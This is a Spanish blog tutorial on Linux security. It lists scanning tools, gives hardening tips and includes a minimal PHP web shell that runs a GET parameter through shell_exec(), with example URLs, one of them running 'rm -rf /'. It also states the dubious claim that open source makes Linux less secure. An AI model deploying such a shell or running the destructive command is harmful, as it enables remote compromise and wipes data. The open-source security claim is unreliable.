Hackear el sistema operativo Linux: Más tutorial de ejemplo sobre Ubuntu

Hackear el sistema operativo Linux: tutorial completo con ejemplo sobre Ubuntu

Linux es el sistema operativo de servidor más utilizado, especialmente para servidores web. Es de código abierto lo que significa que cualquiera puede tener acceso a su código fuente.

Esto lo hace menos seguro en comparación con otros sistemas operativos, ya que los atacantes pueden estudiar el código fuente para encontrar vulnerabilidades.

Contenido pendiente de una última revisión.
Es posible que este tutorial no funcione en las últimas versiones de Ubuntu.

Introducción breve a Linux

Linux es un sistema operativo de código abierto. Existen muchas distribuciones de sistemas operativos basados en Linux como Redhat, Fedora y Ubuntu, etc. Si eres un principiante, quizás puedes probar con las mejores distros par principiantes en Unix.

A diferencia de otros sistemas operativos, Linux es menos seguro cuando se trata de seguridad. Esto se debe a que el código fuente está disponible libremente, por lo que es fácil estudiarlo en busca de vulnerabilidades y explotarlas en comparación con otros sistemas operativos que no son de código abierto.

Linux se puede utilizar como servidor, escritorio, tableta o sistema operativo de dispositivo móvil.

Los programas de Linux se pueden operar usando GUI o comandos. Los comandos de Linux para la piratería de Kali Linux son más efectivos y eficientes en comparación con el uso de la GUI. Por esta razón, ayuda conocer los comandos básicos de Linux para piratear.

Herramientas de piratería de Linux

  • Nessus: : esta herramienta se puede usar para hackear Ubuntu, escanear configuraciones, parches y redes, etc. se puede encontrar en https://www.tenable.com/products/nessus
  • NMap: Esta herramienta se puede utilizar para supervisar los hosts que se ejecutan en el servidor y los servicios que están utilizando. También se puede utilizar para buscar puertos. Se puede encontrar en https://nmap.org/
  • SARA: SARA es el acrónimo de Security Auditor’s Research Assistant. Como su nombre lo indica, esta herramienta se puede utilizar para auditar redes contra amenazas como SQL
  • injection, XSS, etc. se puede encontrar en http://www-arc.com/sara/sara.html

La lista anterior no es exhaustiva, solo da una idea de las herramientas disponibles para la piratería de Ubuntu y la piratería de sistemas Linux.

Cómo prevenir los hacks de Linux

Linux Hacking se aprovecha de las vulnerabilidades en el sistema operativo, una organización puede adoptar la siguiente política para protegerse contra tales ataques.

  • Administración de parches: los parches corrigen errores que los atacantes explotan para comprometer un sistema. Una buena política de administración de parches asegurará que aplique constantemente parches relevantes a su sistema.
  • Configuración adecuada del sistema operativo: otros exploits se aprovechan de las debilidades en la configuración del servidor. Los nombres de usuario y demonios inactivos deben deshabilitarse. Se debe cambiar la configuración predeterminada, como las contraseñas comunes de la aplicación, los nombres de usuario predeterminados y algunos números de puerto.
  • Sistema de detección de intrusos: estas herramientas se pueden utilizar para detectar el acceso no autorizado al sistema. Algunas herramientas tienen la capacidad de detectar y prevenir tales ataques.

Actividad de piratería: Hackear un sistema Ubuntu Linux usando PHP

En este escenario práctico, aprenderemos cómo hackear con Ubuntu y le proporcionaremos información básica sobre cómo puede usar PHP para comprometer un Linux. No vamos a apuntar a ninguna víctima.

Si deseas probarlo, puede instalar LAMPP en tu máquina local.

PHP viene con dos funciones que se pueden usar para ejecutar comandos de piratería de Linux. Tiene funciones exec() y shell_exec(). La función exec() devuelve la última línea de la salida del comando, mientras que la shell_exec() devuelve todo el resultado del comando como una cadena.

Para fines de demostración, supongamos que los administradores del atacante cargan el siguiente archivo en un servidor web.

<?php
$cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l';
echo "executing shell command:-> $cmd</br>";
$output = shell_exec($cmd);
echo "<pre>$output</pre>";
?>

El script anterior obtiene el comando de la variable GET denominada cmd. El comando se ejecuta utilizando shell_exec() y los resultados devueltos en el navegador.

El código anterior se puede explotar utilizando la siguiente URL:

http://localhost/cp/konsole.php?cmd=ls%20-l

  • “… konsole.php?cmd=ls%20-l” asignael valor ls –l a la variable cmd.

El comando en Ubuntu para hackear contra el servidor se ejecutará como:

shell_exec('ls -l') ;

El comando anterior simplemente muestra los archivos en el directorio actual y los permisos. Supongamos que el atacante pasa el siguiente comando.

rm -rf /
  • “rm” elimina los archivos
  • “rf” hace que el comando rm se ejecute en modo recursivo. Eliminación de todas las carpetas y archivos.
  • “/” indica al comando que comience a eliminar archivos del directorio raíz.

La URL del ataque se vería algo como esto:

http://localhost/cp/konsole.php?cmd=rm%20-rf%20/

Resumen

  • Linux es un sistema operativo popular para servidores, computadoras de escritorio, tabletas y dispositivos móviles.
  • Linux es de código abierto, y el código fuente puede ser obtenido por cualquier persona. Esto hace que sea fácil detectar las vulnerabilidades. Es uno de los mejores sistemas operativos para hackers.
  • Los comandos básicos y de piratería de redes en Ubuntu son valiosos para los piratas informáticos de Linux.
  • Las vulnerabilidades son una debilidad que puede ser explotada para comprometer un sistema.
  • Una buena seguridad puede ayudar a proteger un sistema de ser comprometido por un atacante.

? Libro Hacking desde 0


? Herramientas Hacking ? Recursos Hacking


?‍♀️ Cursos Seguridad en Red ? Cursos RedesCursos Servicios en Nube ?‍♂️ Libros Seguridad y Criptografía

Relacionado

❌ React Native, crear aplicación como Netflix con Mario Díez

[no_toc] [expand title="Índice del Vídeotutorial"] 1. FlatList Horizontal 2. Componente Swiper 3. Menú Animado y Header 4. FlatList Grid 5. Más Flexbox, Tabs y Linear gradiantes 6. Reproductor de Vídeo 7. Share API 8. Animatable Header y NativeEvents 9. React Navigation 10. Header Múltiple con Animated 11. Modal con React Navigation 12. React Navigation con Redux 13. Servidor NodeJS con MongoDB para React Native 14. Conectando ¡SEGUIR LEYENDO!

❌ React Native con Mario Díez

[no_toc] [expand title="Índice del Vídeotutorial"] 1. Instalación 2. Introducción 3. Props y State 4. Fetch Data 5. ListView 6. Fech Data 2 7. Navigator IOS 8. Navigator 9. Flexbox 10. PropTypes 11. TabBarIOS 12. Formularios 13. AsyncStorage 14. Recorriendo Arrays con Map 15. Notificaciones Push 16. Notificaciones Push desde NodeJS 17. Barra de Búsqueda en ListView 18. Utilización de CameraRoll 19. Children o Props 20. Diferenciar ¡SEGUIR LEYENDO!

❌ React Native con Iván B. Trujillo

[no_toc] [expand title="Índice del Vídeotutorial"] 1. Primeros Pasos 2. Componentes, Botones y Alertas 3. Pantalla de Login, Navegador y Vistas 4. Navegación por Pestañas 5. Peticiones a API y ListView 6. Vista Detalles y Paso de Propiedades a Componente Hijo [/expand] [yotuwp type="playlist" id="PLuzQ5Ac_9_cI-ukaElfIFKXyhLsADBiJe" ] [expand title="Creador"] Editor del blog de Medium: Canarias JS [/expand]

❌ Javascript con Píldoras Informáticas

[no_toc] [expand title="Índice del Vídeotutorial"] 1. Presentación. Vídeo 1 2. Introducción. Vídeo 2 3. Sintaxis Básica I. Ubicación del código. Vídeo 3 4. Sintaxis Básica II. Estructuras Básicas. Vídeo 4 5. Sintaxis Básica III. Operadores Básicos. Vídeo 5 6. Sintaxis Básica IV. Operadores y prompt. Vídeo 6 7. Sintaxis Básica V Arrays, Matrices, Arreglos. Vídeo 7 8. Sintaxis Básica V. Arrays, Matrices, Arreglos II. Vídeo 8 ¡SEGUIR LEYENDO!

❌ Javascript con Falcon Masters

[no_toc] [expand title="Índice del Vídeotutorial"] 1. Introducción 2. Variables 3. Tipos de Dato 4. Arreglos 5. Metodos y propiedades para los Arreglos 6. Condicionales 7. Ciclo Fo 8. Ciclo While 9. Funciones 10. Ejercicio con Funciones y Formularios 11. Scope de Javascript (ámbito de las variables) 12. Metodos y propiedades para Cadenas de Texto 13. Introducción al DOM (Document Object Model) 14. Creando Nodos del DOM ¡SEGUIR LEYENDO!

Salir de la versión móvil